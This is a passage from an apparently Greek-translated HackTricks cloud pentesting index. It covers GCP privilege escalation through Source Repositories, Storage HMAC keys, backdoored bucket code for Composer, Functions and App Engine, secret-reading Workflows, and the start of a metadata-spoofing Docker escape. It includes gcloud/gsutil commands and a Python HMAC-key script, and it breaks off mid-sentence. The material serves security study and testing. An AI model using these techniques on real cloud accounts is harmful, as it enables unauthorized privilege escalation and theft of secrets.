Sourcerepos Privesc » source.repos.update","id":"1066","title":"source.repos.update"},"1067":{"body":"Με αυτή την άδεια, ένας επιτιθέμενος θα μπορούσε να παραχωρήσει στον εαυτό του τις προηγούμενες άδειες.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » source.repos.setIamPolicy","id":"1067","title":"source.repos.setIamPolicy"},"1068":{"body":"Εάν ο επιτιθέμενος έχει πρόσβαση στα μυστικά όπου αποθηκεύονται τα tokens, θα μπορέσει να τα κλέψει. Για περισσότερες πληροφορίες σχετικά με το πώς να αποκτήσετε πρόσβαση σε ένα μυστικό, ελέγξτε: GCP - Secretmanager Privesc","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » Πρόσβαση σε μυστικά","id":"1068","title":"Πρόσβαση σε μυστικά"},"1069":{"body":"Είναι δυνατή η προσθήκη κλειδιών ssh στο έργο του Αποθετηρίου Πηγής στην ιστοσελίδα κονσόλας. Κάνει μια αίτηση POST στο /v1/sshKeys:add και μπορεί να ρυθμιστεί στο https://source.cloud.google.com/user/ssh_keys Αφού ρυθμιστεί το κλειδί ssh σας, μπορείτε να αποκτήσετε πρόσβαση σε ένα αποθετήριο με: bash git clone ssh://username@domain.com@source.developers.google.com:2022/p//r/ Και στη συνέχεια χρησιμοποιήστε τις εντολές git όπως συνήθως.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » Προσθήκη κλειδιών SSH","id":"1069","title":"Προσθήκη κλειδιών SSH"},"107":{"body":"Reading time: 7 minutes tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"Gitea Security » Gitea Security","id":"107","title":"Gitea Security"},"1070":{"body":"Είναι δυνατόν να δημιουργήσετε χειροκίνητα διαπιστευτήρια για να αποκτήσετε πρόσβαση στα Source Repositories: Κάνοντας κλικ στον πρώτο σύνδεσμο θα σας κατευθύνει στο https://source.developers.google.com/auth/start?scopes=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform&state&authuser=3 Το οποίο θα σας ζητήσει ένα Oauth authorization prompt για να δώσει πρόσβαση στο Google Cloud Development . Έτσι θα χρειαστείτε είτε τα διαπιστευτήρια του χρήστη είτε μια ανοιχτή συνεδρία στον περιηγητή για αυτό. Αυτό θα σας στείλει σε μια σελίδα με ένα bash script για εκτέλεση και να ρυθμίσετε ένα git cookie στο $HOME/.gitcookies Εκτελώντας το script μπορείτε στη συνέχεια να χρησιμοποιήσετε git clone, push... και θα λειτουργήσει.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » Χειροκίνητα Διαπιστευτήρια","id":"1070","title":"Χειροκίνητα Διαπιστευτήρια"},"1071":{"body":"Με αυτή την άδεια είναι δυνατόν να απενεργοποιήσετε την προεπιλεγμένη προστασία των Source Repositories για να μην ανεβάσετε κώδικα που περιέχει Ιδιωτικά Κλειδιά: bash gcloud source project-configs update --disable-pushblock Μπορείτε επίσης να ρυθμίσετε ένα διαφορετικό θέμα pub/sub ή ακόμη και να το απενεργοποιήσετε εντελώς: bash gcloud source project-configs update --remove-topic=REMOVE_TOPIC\ngcloud source project-configs update --remove-topic=UPDATE_TOPIC tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » source.repos.updateProjectConfig","id":"1071","title":"source.repos.updateProjectConfig"},"1072":{"body":"Reading time: 7 minutes tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » GCP - Storage Privesc","id":"1072","title":"GCP - Storage Privesc"},"1073":{"body":"Βασικές Πληροφορίες: GCP - Storage Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » Storage","id":"1073","title":"Storage"},"1074":{"body":"Αυτή η άδεια σας επιτρέπει να κατεβάσετε αρχεία που είναι αποθηκευμένα στο Cloud Storage . Αυτό θα μπορούσε ενδεχομένως να σας επιτρέψει να κλιμακώσετε τα προνόμια σας, διότι σε ορισμένες περιπτώσεις ευαίσθητες πληροφορίες αποθηκεύονται εκεί . Επιπλέον, ορισμένες υπηρεσίες GCP αποθηκεύουν τις πληροφορίες τους σε buckets: GCP Composer : Όταν δημιουργείτε ένα Περιβάλλον Composer, ο κώδικας όλων των DAGs θα αποθηκευτεί μέσα σε ένα bucket . Αυτές οι εργασίες μπορεί να περιέχουν ενδιαφέρουσες πληροφορίες μέσα στον κώδικά τους. GCR (Container Registry) : Η εικόνα των κοντέινερ αποθηκεύεται μέσα σε buckets , που σημαίνει ότι αν μπορείτε να διαβάσετε τα buckets, θα μπορείτε να κατεβάσετε τις εικόνες και να αναζητήσετε διαρροές και/ή πηγαίο κώδικα .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.objects.get","id":"1074","title":"storage.objects.get"},"1075":{"body":"Μπορείτε να σας δώσετε άδεια να καταχραστείτε οποιοδήποτε από τα προηγούμενα σενάρια αυτής της ενότητας .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.objects.setIamPolicy","id":"1075","title":"storage.objects.setIamPolicy"},"1076":{"body":"Για ένα παράδειγμα σχετικά με το πώς να τροποποιήσετε τις άδειες με αυτή την άδεια, ελέγξτε αυτή τη σελίδα: GCP - Public Buckets Privilege Escalation","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.buckets.setIamPolicy","id":"1076","title":"storage.buckets.setIamPolicy"},"1077":{"body":"Η δυνατότητα \"διαλειτουργικότητας\" του Cloud Storage, σχεδιασμένη για διασυνοριακές αλληλεπιδράσεις όπως με το AWS S3, περιλαμβάνει τη δημιουργία HMAC κλειδιών για Λογαριασμούς Υπηρεσιών και χρήστες . Ένας επιτιθέμενος μπορεί να εκμεταλλευτεί αυτό δημιουργώντας ένα HMAC κλειδί για έναν Λογαριασμό Υπηρεσίας με ανυψωμένα προνόμια, έτσι κλιμακώνοντας τα προνόμια μέσα στο Cloud Storage . Ενώ τα HMAC κλειδιά που σχετίζονται με χρήστες είναι προσβάσιμα μόνο μέσω της διαδικτυακής κονσόλας, τόσο τα κλειδιά πρόσβασης όσο και τα μυστικά κλειδιά παραμένουν μόνιμα προσβάσιμα , επιτρέποντας πιθανή αποθήκευση πρόσβασης backup. Αντίθετα, τα HMAC κλειδιά που συνδέονται με Λογαριασμούς Υπηρεσιών είναι προσβάσιμα μέσω API, αλλά τα κλειδιά πρόσβασης και τα μυστικά κλειδιά τους δεν είναι ανακτήσιμα μετά τη δημιουργία τους, προσθέτοντας μια επιπλέον στρώση πολυπλοκότητας για συνεχή πρόσβαση. bash # Create key\ngsutil hmac create # You might need to execute this inside a VM instance ## If you have TROUBLES creating the HMAC key this was you can also do it contacting the API directly:\nPROJECT_ID = '$PROJECT_ID'\nTARGET_SERVICE_ACCOUNT = f\"exam-storage-sa-read-flag-3@{PROJECT_ID}.iam.gserviceaccount.com\"\nACCESS_TOKEN = \"$CLOUDSDK_AUTH_ACCESS_TOKEN\"\nimport requests\nimport json\nkey = requests.post(\nf'https://www.googleapis.com/storage/v1/projects/{PROJECT_ID}/hmacKeys',\nparams={'access_token': ACCESS_TOKEN, 'serviceAccountEmail': TARGET_SERVICE_ACCOUNT}\n).json()\n#print(json.dumps(key, indent=4))\nprint(f'ID: {key[\"metadata\"][\"accessId\"]}')\nprint(f'Secret: {key[\"secret\"]}') # Configure gsutil to use the HMAC key\ngcloud config set pass_credentials_to_gsutil false\ngsutil config -a # Use it\ngsutil ls gs://[BUCKET_NAME] # Restore\ngcloud config set pass_credentials_to_gsutil true Ένα άλλο exploit script για αυτή τη μέθοδο μπορεί να βρεθεί εδώ .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.hmacKeys.create","id":"1077","title":"storage.hmacKeys.create"},"1078":{"body":"Για να δημιουργήσετε ένα νέο αντικείμενο μέσα σε ένα bucket χρειάζεστε storage.objects.create και, σύμφωνα με τα docs , χρειάζεστε επίσης storage.objects.delete για να τροποποιήσετε ένα υπάρχον αντικείμενο. Μια πολύ συνηθισμένη εκμετάλλευση των buckets όπου μπορείτε να γράψετε στο cloud είναι στην περίπτωση που το bucket αποθηκεύει αρχεία web server , μπορεί να είστε σε θέση να αποθηκεύσετε νέο κώδικα που θα χρησιμοποιηθεί από την web εφαρμογή.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.objects.create, storage.objects.delete = Δικαιώματα Εγγραφής Αποθήκης","id":"1078","title":"storage.objects.create, storage.objects.delete = Δικαιώματα Εγγραφής Αποθήκης"},"1079":{"body":"Composer είναι Apache Airflow που διαχειρίζεται μέσα στο GCP. Έχει αρκετές ενδιαφέρουσες δυνατότητες: Εκτελείται μέσα σε ένα GKE cluster , οπότε ο SA που χρησιμοποιεί το cluster είναι προσβάσιμος από τον κώδικα που εκτελείται μέσα στο Composer Όλα τα στοιχεία ενός περιβάλλοντος composer ( κώδικας DAGs , plugins και δεδομένα) αποθηκεύονται μέσα σε ένα GCP bucket. Αν ο επιτιθέμενος έχει δικαιώματα ανάγνωσης και εγγραφής σε αυτό, θα μπορούσε να παρακολουθεί το bucket και όποτε δημιουργείται ή ενηρώνεται ένα DAG, να υποβάλει μια εκδοχή με backdoor ώστε το περιβάλλον composer να πάρει από την αποθήκη την εκδοχή με backdoor. Μπορείτε να βρείτε ένα PoC αυτής της επίθεσης στο repo: https://github.com/carlospolop/Monitor-Backdoor-Composer-DAGs","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » Composer","id":"1079","title":"Composer"},"108":{"body":"Gitea είναι μια λύση φιλοξενίας κώδικα ελαφριάς διαχείρισης από την κοινότητα που έχει γραφτεί σε Go.","breadcrumbs":"Gitea Security » Τι είναι το Gitea","id":"108","title":"Τι είναι το Gitea"},"1080":{"body":"Ο κώδικας των Cloud Functions αποθηκεύεται στο Storage και όποτε δημιουργείται μια νέα έκδοση, ο κώδικας σπρώχνεται στο bucket και στη συνέχεια το νέο container κατασκευάζεται από αυτόν τον κώδικα. Επομένως, η αντικατάσταση του κώδικα πριν κατασκευαστεί η νέα έκδοση είναι δυνατή για να εκτελέσει η cloud function αυθαίρετο κώδικα . Μπορείτε να βρείτε ένα PoC αυτής της επίθεσης στο repo: https://github.com/carlospolop/Monitor-Backdoor-Cloud-Functions","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » Cloud Functions","id":"1080","title":"Cloud Functions"},"1081":{"body":"Οι εκδόσεις του AppEngine δημιουργούν κάποια δεδομένα μέσα σε ένα bucket με τη μορφή ονόματος: staging..appspot.com. Μέσα σε αυτό το bucket, είναι δυνατή η εύρεση ενός φακέλου που ονομάζεται ae που θα περιέχει έναν φάκελο ανά έκδοση της εφαρμογής AppEngine και μέσα σε αυτούς τους φακέλους θα είναι δυνατή η εύρεση του αρχείου manifest.json. Αυτό το αρχείο περιέχει ένα json με όλα τα αρχεία που πρέπει να χρησιμοποιηθούν για τη δημιουργία της συγκεκριμένης έκδοσης. Επιπλέον, είναι δυνατή η εύρεση των πραγματικών ονομάτων των αρχείων, της διεύθυνσης URL τους μέσα στο GCP bucket (τα αρχεία μέσα στο bucket άλλαξαν το όνομά τους για το sha1 hash τους) και του sha1 hash κάθε αρχείου. Σημειώστε ότι δεν είναι δυνατή η προ-κατάληψη αυτού του bucket επειδή οι χρήστες GCP δεν είναι εξουσιοδοτημένοι να δημιουργούν buckets χρησιμοποιώντας το όνομα τομέα appspot.com. Ωστόσο, με δικαιώματα ανάγνωσης και εγγραφής σε αυτό το bucket, είναι δυνατή η κλιμάκωση των προνομίων στον SA που συνδέεται με την έκδοση του App Engine παρακολουθώντας το bucket και κάθε φορά που γίνεται μια αλλαγή (νέα έκδοση), να τροποποιείτε τη νέα έκδοση όσο το δυνατόν πιο γρήγορα. Με αυτόν τον τρόπο, το container που δημιουργείται από αυτόν τον κώδικα θα εκτελεί τον κώδικα με backdoor. Η αναφερόμενη επίθεση μπορεί να εκτελεστεί με πολλούς διαφορετικούς τρόπους, όλοι ξεκινούν παρακολουθώντας το bucket staging..appspot.com: Ανεβάστε τον πλήρη νέο κώδικα της έκδοσης του AppEngine σε ένα διαφορετικό και διαθέσιμο bucket και ετοιμάστε ένα manifest.json αρχείο με το νέο όνομα bucket και τα sha1 hashes τους . Στη συνέχεια, όταν δημιουργείται μια νέα έκδοση μέσα στο bucket, απλώς χρειάζεται να τροποποιήσετε το αρχείο manifest.json και να ανεβάσετε το κακόβουλο. Ανεβάστε μια τροποποιημένη έκδοση του requirements.txt που θα χρησιμοποιεί τον κακόβουλο κώδικα εξαρτήσεων και θα ενημερώνει το αρχείο manifest.json με το νέο όνομα αρχείου, τη διεύθυνση URL και το hash του. Ανεβάστε ένα τροποποιημένο αρχείο main.py ή app.yaml που θα εκτελεί τον κακόβουλο κώδικα και θα ενημερώνει το αρχείο manifest.json με το νέο όνομα αρχείου, τη διεύθυνση URL και το hash του. Μπορείτε να βρείτε ένα PoC αυτής της επίθεσης στο repo: https://github.com/carlospolop/Monitor-Backdoor-AppEngine","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » App Engine","id":"1081","title":"App Engine"},"1082":{"body":"Google Container Registry αποθηκεύει τις εικόνες μέσα σε buckets, αν μπορείτε να γράψετε σε αυτά τα buckets μπορεί να είστε σε θέση να μετακινηθείτε πλευρικά εκεί όπου εκτελούνται αυτά τα buckets. Το bucket που χρησιμοποιείται από το GCR θα έχει μια διεύθυνση URL παρόμοια με gs://.artifacts..appspot.com (Οι κορυφαίοι υποτομείς καθορίζονται εδώ ). tip Αυτή η υπηρεσία είναι απαρχαιωμένη, οπότε αυτή η επίθεση δεν είναι πλέον χρήσιμη. Επιπλέον, το Artifact Registry, η υπηρεσία που αντικαθιστά αυτήν, δεν αποθηκεύει τις εικόνες σε buckets.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » GCR","id":"1082","title":"GCR"},"1083":{"body":"https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#:~:text=apiKeys.-,create,privileges%20than%20our%20own%20user. tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » Αναφορές","id":"1083","title":"Αναφορές"},"1084":{"body":"Reading time: 4 minutes tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » GCP - Workflows Privesc","id":"1084","title":"GCP - Workflows Privesc"},"1085":{"body":"Βασικές Πληροφορίες: GCP - Workflows Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » Workflows","id":"1085","title":"Workflows"},"1086":{"body":"Όπως γνωρίζω, δεν είναι δυνατόν να αποκτήσετε ένα shell με πρόσβαση στο endpoint μεταδεδομένων που περιέχει τα διαπιστευτήρια SA του SA που επιτίθεται σε ένα Workflow. Ωστόσο, είναι δυνατόν να καταχραστείτε τις άδειες του SA προσθέτοντας τις ενέργειες που πρέπει να εκτελούνται μέσα στο Workflow. Είναι δυνατόν να βρείτε την τεκμηρίωση των συνδετήρων. Για παράδειγμα, αυτή είναι η σελίδα του συνδετήρα Secretmanager . Στη γραμμή πλοήγησης είναι δυνατόν να βρείτε αρκετούς άλλους συνδετήρες. Και εδώ μπορείτε να βρείτε ένα παράδειγμα ενός συνδετήρα που εκτυπώνει ένα μυστικό: yaml main:\nparams: [input]\nsteps:\n- access_string_secret:\ncall: googleapis.secretmanager.v1.projects.secrets.versions.accessString\nargs:\nsecret_id: secret_name\nversion: 1\nproject_id: project-id\nresult: str_secret\n- returnOutput:\nreturn: \"${str_secret}\" Ενημέρωση από το CLI: bash gcloud workflows deploy \\\n--service-account=email@SA \\\n--source=/path/to/config.yaml \\\n--location us-central1 Αν λάβετε ένα σφάλμα όπως ERROR: (gcloud.workflows.deploy) FAILED_PRECONDITION: Workflows service agent does not exist, απλά περιμένετε ένα λεπτό και δοκιμάστε ξανά . Αν δεν έχετε πρόσβαση στο διαδίκτυο, είναι δυνατόν να ενεργοποιήσετε και να δείτε την εκτέλεση ενός Workflow με: bash # Run execution with output\ngcloud workflows run --location us-central1 # Run execution without output\ngcloud workflows execute --location us-central1 # List executions\ngcloud workflows executions list # Get execution info and output\ngcloud workflows executions describe projects//locations//workflows//executions/ caution Μπορείτε επίσης να ελέγξετε την έξοδο προηγούμενων εκτελέσεων για να αναζητήσετε ευαίσθητες πληροφορίες Σημειώστε ότι ακόμη και αν λάβετε ένα σφάλμα όπως PERMISSION_DENIED: Permission 'workflows.operations.get' denied on... επειδή δεν έχετε αυτή την άδεια, η ροή εργασίας έχει δημιουργηθεί.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » workflows.workflows.create, iam.serviceAccounts.ActAs, workflows.executions.create, (workflows.workflows.get, workflows.operations.get)","id":"1086","title":"workflows.workflows.create, iam.serviceAccounts.ActAs, workflows.executions.create, (workflows.workflows.get, workflows.operations.get)"},"1087":{"body":"Σύμφωνα με τα έγγραφα , είναι δυνατόν να χρησιμοποιήσετε βήματα ροής εργασίας που θα στείλουν ένα HTTP αίτημα με το OAuth ή OIDC token. Ωστόσο, όπως και στην περίπτωση του Cloud Scheduler , το HTTP αίτημα με το Oauth token πρέπει να είναι προς τον διακομιστή .googleapis.com. caution Επομένως, είναι δυνατό να διαρρεύσει το OIDC token υποδεικνύοντας ένα HTTP endpoint που ελέγχεται από τον χρήστη, αλλά για να διαρρεύσει το OAuth token θα χρειαστείτε μια παράκαμψη για αυτή την προστασία. Ωστόσο, μπορείτε ακόμα να επικοινωνήσετε με οποιοδήποτε GCP api για να εκτελέσετε ενέργειες εκ μέρους του SA χρησιμοποιώντας είτε συνδέσμους είτε HTTP αιτήματα με το OAuth token. Oauth yaml - step_A:\ncall: http.post\nargs:\nurl: https://compute.googleapis.com/compute/v1/projects/myproject1234/zones/us-central1-b/instances/myvm001/stop\nauth:\ntype: OAuth2\nscopes: OAUTH_SCOPE OIDC yaml - step_A:\ncall: http.get\nargs:\nurl: https://us-central1-project.cloudfunctions.net/functionA\nquery:\nfirstNumber: 4\nsecondNumber: 6\noperation: sum\nauth:\ntype: OIDC\naudience: OIDC_AUDIENCE","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » Διαρροή OIDC token (και OAuth?)","id":"1087","title":"Διαρροή OIDC token (και OAuth?)"},"1088":{"body":"Με αυτή την άδεια αντί για workflows.workflows.create είναι δυνατή η ενημέρωση ενός ήδη υπάρχοντος workflow και η εκτέλεση των ίδιων επιθέσεων. tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » workflows.workflows.update ...","id":"1088","title":"workflows.workflows.update ..."},"1089":{"body":"Reading time: 2 minutes tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » GCP - Γενικές Άδειες Privesc","id":"1089","title":"GCP - Γενικές Άδειες Privesc"},"109":{"body":"Basic Gitea Information","breadcrumbs":"Gitea Security » Βασικές Πληροφορίες","id":"109","title":"Βασικές Πληροφορίες"},"1090":{"body":"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » Γενικές Ενδιαφέρουσες Άδειες","id":"1090","title":"Γενικές Ενδιαφέρουσες Άδειες"},"1091":{"body":"Αν κατέχετε έναν χρήστη που έχει την άδεια setIamPolicy σε έναν πόρο, μπορείτε να αναβαθμίσετε τα προνόμιά σας σε αυτόν τον πόρο επειδή θα μπορείτε να αλλάξετε την πολιτική IAM αυτού του πόρου και να αποκτήσετε περισσότερα προνόμια πάνω του. Αυτή η άδεια μπορεί επίσης να επιτρέψει να αναβαθμίσετε σε άλλους φορείς αν ο πόρος επιτρέπει την εκτέλεση κώδικα και η iam.ServiceAccounts.actAs δεν είναι απαραίτητη. cloudfunctions.functions.setIamPolicy Τροποποιήστε την πολιτική μιας Cloud Function για να επιτρέψετε στον εαυτό σας να την καλέσει. Υπάρχουν δεκάδες τύποι πόρων με αυτό το είδος άδειας, μπορείτε να τους βρείτε όλους στο https://cloud.google.com/iam/docs/permissions-reference αναζητώντας το setIamPolicy.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » *.setIamPolicy","id":"1091","title":"*.setIamPolicy"},"1092":{"body":"Αυτές οι άδειες μπορεί να είναι πολύ χρήσιμες για να προσπαθήσετε να αναβαθμίσετε τα προνόμιά σας σε πόρους δημιουργώντας έναν νέο ή ενημερώνοντας έναν νέο . Αυτές οι άδειες είναι ιδιαίτερα χρήσιμες αν έχετε επίσης την άδεια iam.serviceAccounts.actAs σε έναν Λογαριασμό Υπηρεσίας και ο πόρος που έχετε .create/.update μπορεί να συνδέσει έναν λογαριασμό υπηρεσίας.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » *.create, *.update","id":"1092","title":"*.create, *.update"},"1093":{"body":"Αυτή η άδεια συνήθως θα σας επιτρέπει να προσεγγίσετε ή να τροποποιήσετε έναν Λογαριασμό Υπηρεσίας σε κάποιον πόρο (π.χ.: compute.instances.setServiceAccount). Αυτό θα μπορούσε να οδηγήσει σε ένα vector αναβάθμισης προνομίων , αλλά θα εξαρτηθεί από την κάθε περίπτωση. tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » *ServiceAccount*","id":"1093","title":"*ServiceAccount*"},"1094":{"body":"Reading time: 4 minutes tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Network Docker Escape » GCP - Network Docker Escape","id":"1094","title":"GCP - Network Docker Escape"},"1095":{"body":"Σε και τις δύο αναφορές όπου αυτή η τεχνική αναφέρεται, οι επιτιθέμενοι κατάφεραν να αποκτήσουν πρόσβαση root μέσα σε ένα Docker κοντέινερ που διαχειρίζεται η GCP με πρόσβαση στο host network (και τις δυνατότητες CAP_NET_ADMIN και CAP_NET_RAW ).","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Network Docker Escape » Αρχική Κατάσταση","id":"1095","title":"Αρχική Κατάσταση"},"1096":{"body":"Σε μια instance Google Compute Engine, η κανονική επιθεώρηση της δικτυακής κίνησης αποκαλύπτει πολλές καθαρές HTTP αιτήσεις προς την metadata instance στο 169.254.169.254. Ο Google Guest Agent , μια υπηρεσία ανοιχτού κώδικα, κάνει συχνά τέτοιες αιτήσεις. Αυτός ο πράκτορας έχει σχεδιαστεί για να παρακολουθεί τις αλλαγές στη metadata . Σημαντικά, η metadata περιλαμβάνει ένα πεδίο για δημόσιους κωδικούς SSH . Όταν προστεθεί ένα νέο δημόσιο κλειδί SSH στη metadata, ο πράκτορας το εξουσιοδοτεί αυτόματα στο αρχείο .authorized_key. Μπορεί επίσης να δημιουργήσει έναν νέο χρήστη και να τον προσθέσει στους sudoers αν χρειαστεί. Ο πράκτορας παρακολουθεί τις αλλαγές στέλνοντας ένα αίτημα για ανάκτηση όλων των τιμών metadata αναδρομικά (GET /computeMetadata/v1/?recursive=true). Αυτό το αίτημα έχει σχεδιαστεί για να προκαλεί τον διακομιστή metadata να στείλει μια απάντηση μόνο αν υπάρχει κάποια αλλαγή στη metadata από την τελευταία ανάκτηση, που προσδιορίζεται από ένα Etag (wait_for_change=true&last_etag=). Επιπλέον, περιλαμβάνεται μια παράμετρος timeout (timeout_sec=). Αν δεν υπάρξει καμία αλλαγή εντός του καθορισμένου timeout, ο διακομιστής απαντά με τις αμετάβλητες τιμές . Αυτή η διαδικασία επιτρέπει στην IMDS (Instance Metadata Service) να απαντήσει μετά από 60 δευτερόλεπτα αν δεν έχει συμβεί καμία αλλαγή στη διαμόρφωση, δημιουργώντας ένα πιθανό παράθυρο για την εισαγωγή μιας ψεύτικης απάντησης διαμόρφωσης στον πράκτορα. Ένας επιτιθέμενος θα μπορούσε να εκμεταλλευτεί αυτό εκτελώντας μια επίθεση Man-in-the-Middle (MitM) , προσποιούμενος την απάντηση από τον διακομιστή IMDS και εισάγοντας ένα νέο δημόσιο κλειδί . Αυτό θα μπορούσε να επιτρέψει μη εξουσιοδοτημένη πρόσβαση SSH στον host.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Network Docker Escape » Εξήγηση Επίθεσης","id":"1096","title":"Εξήγηση Επίθεσης"},"1097":{"body":"Ενώ η spoofing ARP είναι αναποτελεσματική στα δίκτυα Google Compute Engine, μια τροποποιημένη έκδοση του rshijack που αναπτύχθηκε από τον Ezequiel μπορεί να χρησιμοποιηθεί για την εισαγωγή πακέτων στην επικοινωνία για να εισαχθεί ο χρήστης SSH. Αυτή η έκδοση του rshijack επιτρέπει την εισαγωγή των αριθμών ACK και SEQ ως παραμέτρους γραμμής εντολών, διευκολύνοντας την προσποίηση μιας απάντησης πριν από την πραγματική απάντηση του διακομιστή Metadata. Επιπλέον, χρησιμοποιείται ένα μικρό Shell script για να επιστρέψει ένα ειδικά κατασκευασμένο payload . Αυτό το payload 